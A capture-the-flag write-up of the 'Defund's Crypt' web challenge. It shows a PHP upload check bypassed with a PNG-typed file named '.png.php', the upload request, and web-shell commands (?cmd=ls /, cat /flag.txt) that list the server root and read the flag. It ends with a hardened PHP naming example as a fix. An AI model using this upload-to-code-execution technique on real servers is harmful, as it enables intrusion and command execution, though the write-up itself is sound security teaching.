# ▼▼▼Defund's Crypt (Web, 120pts, 304/1596=19.0%)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

`https://crypt.2020.chall.actf.co/src.php`

↓

```

<html>  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width,initial-scale=1">  
<link
href="https://fonts.googleapis.com/css?family=Inconsolata|Special+Elite&display=swap"
rel="stylesheet">  
<link rel="stylesheet" href="/style.css">  
<title>Defund's Crypt</title>  
</head>  
<body>  
  
  
<h1>Defund's Crypt<span>o</span></h1>  
1000000) {
    throw new RuntimeException('People can only remember so much..');
}
$finfo = new finfo(FILEINFO_MIME_TYPE);
if (false === $ext = array_search(
    $finfo->file($_FILES['imgfile']['tmp_name']),
    array(
        '.jpg' => 'image/jpeg',
        '.png' => 'image/png',
        '.bmp' => 'image/bmp',
    ),
    true
)) {
    throw new RuntimeException("Your memory isn't picturesque enough to be remembered.");
}
if (strpos($_FILES["imgfile"]["name"], $ext) === false) {
    throw new RuntimeException("The name of your memory doesn't seem to match its content.");
}
$bname = basename($_FILES["imgfile"]["name"]);
$fname = sprintf("%s%s", sha1_file($_FILES["imgfile"]["tmp_name"]), substr($bname, strpos($bname, ".")));
if (!move_uploaded_file(
    $_FILES['imgfile']['tmp_name'],
    "./memories/" . $fname
)) {
    throw new RuntimeException('Your memory failed to be remembered.');
}
http_response_code(301);
header("Location: /memories/" . $fname);
} catch (RuntimeException $e) {
    echo "

" . $e->getMessage() . "

";
}
}
?>
![](crypt.jpg)  
<form method="POST" action="/" autocomplete="off" spellcheck="false"
enctype="multipart/form-data">  

Leave a memory:

  
<input type="file" id="imgfile" name="imgfile">  
<label for="imgfile" id="imglbl">Choose an image...</label>  
<input type="submit" value="Descend">  
</form>  
<script>  
imgfile.oninput = _ => {  
imgfile.classList.add("satisfied");  
imglbl.innerText = imgfile.files[0].name;  
};  
</script>  
</body>  
</html>  
```

↓

```
if (false === $ext = array_search(
    $finfo->file($_FILES['imgfile']['tmp_name']),
    array(
        '.jpg' => 'image/jpeg',
        '.png' => 'image/png',
        '.bmp' => 'image/bmp',
    ),
    true
)) {
    throw new RuntimeException("Your memory isn't picturesque enough to be remembered.");
}
if (strpos($_FILES["imgfile"]["name"], $ext) === false) {
    throw new RuntimeException("The name of your memory doesn't seem to match its content.");
}
```

↓

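To pass both checks, the file content only has to be detected as an allowed MIME type (for example `image/png`), and the matching extension (`.png`) only has to appear somewhere in the file name. Because the stored name keeps everything from the first `.` of the uploaded name, a name ending in `.png.php` is stored with a `.php` suffix.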

↓

```
POST / HTTP/1.1
Host: crypt.2020.chall.actf.co
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrDvxOBjItkRppQlH
Content-Length: 234

------WebKitFormBoundaryrDvxOBjItkRppQlH
Content-Disposition: form-data; name="imgfile"; filename="hacker_white1.png.php"
Content-Type: image/png

?PNG

------WebKitFormBoundaryrDvxOBjItkRppQlH--
```

↓

```  
Location: /memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php  
```

---

`https://crypt.2020.chall.actf.co/memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php?cmd=ls%20/`

↓

```  
?PNG ? bin boot dev etc flag.txt home lib lib64 media mnt opt proc root run
sbin srv sys tmp usr var  
```

---

`https://crypt.2020.chall.actf.co/memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php?cmd=cat%20/flag.txt`

↓

`{actf{th3_ch4ll3ng3_h4s_f4ll3n_but_th3_crypt_rem4ins}`
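
Why the upload above is stored as `.png.php`, and one way to close it, as an added example that is not part of the challenge source or of this writeup: `stored_name_as_on_page` mirrors the two checks and the suffix logic from `src.php`, while `stored_name_hardened` takes the suffix only from the allow-list. The function names, the placeholder hash and the sample inputs are assumptions, and the detected MIME type is passed in instead of being read with `finfo`.

```php
<?php
// Added example, not the challenge's code. Function names are hypothetical.
const ALLOWED = [
    '.jpg' => 'image/jpeg',
    '.png' => 'image/png',
    '.bmp' => 'image/bmp',
];

// Same decisions as the handler on this page: the extension only has to occur
// somewhere in the client name, and the stored suffix starts at the first dot.
function stored_name_as_on_page(string $clientName, string $mime, string $sha1): ?string
{
    $ext = array_search($mime, ALLOWED, true);
    if ($ext === false || strpos($clientName, $ext) === false) {
        return null; // rejected
    }
    $bname = basename($clientName);
    return $sha1 . substr($bname, strpos($bname, '.'));
}

// Hardened: the client-supplied name contributes nothing to the stored name.
// The suffix comes only from the allow-list entry for the detected type.
function stored_name_hardened(string $mime, string $sha1): ?string
{
    $ext = array_search($mime, ALLOWED, true);
    return $ext === false ? null : $sha1 . $ext;
}

// Constructed inputs. The hash is a placeholder, not a real sha1_file() result.
$sha1 = str_repeat('0', 40);
$cases = [
    ['photo.png', 'image/png'],
    ['hacker_white1.png.php', 'image/png'], // file name from the request above
    ['notes.txt', 'text/plain'],
];
foreach ($cases as [$name, $mime]) {
    printf(
        "%-24s page: %-50s hardened: %s\n",
        $name,
        stored_name_as_on_page($name, $mime, $sha1) ?? 'rejected',
        stored_name_hardened($mime, $sha1) ?? 'rejected'
    );
}
```

Deriving the suffix from the detected type removes the `.php` ending; serving the upload directory with script execution disabled, or storing uploads outside the web root, covers the case where a file with an executable suffix gets written anyway.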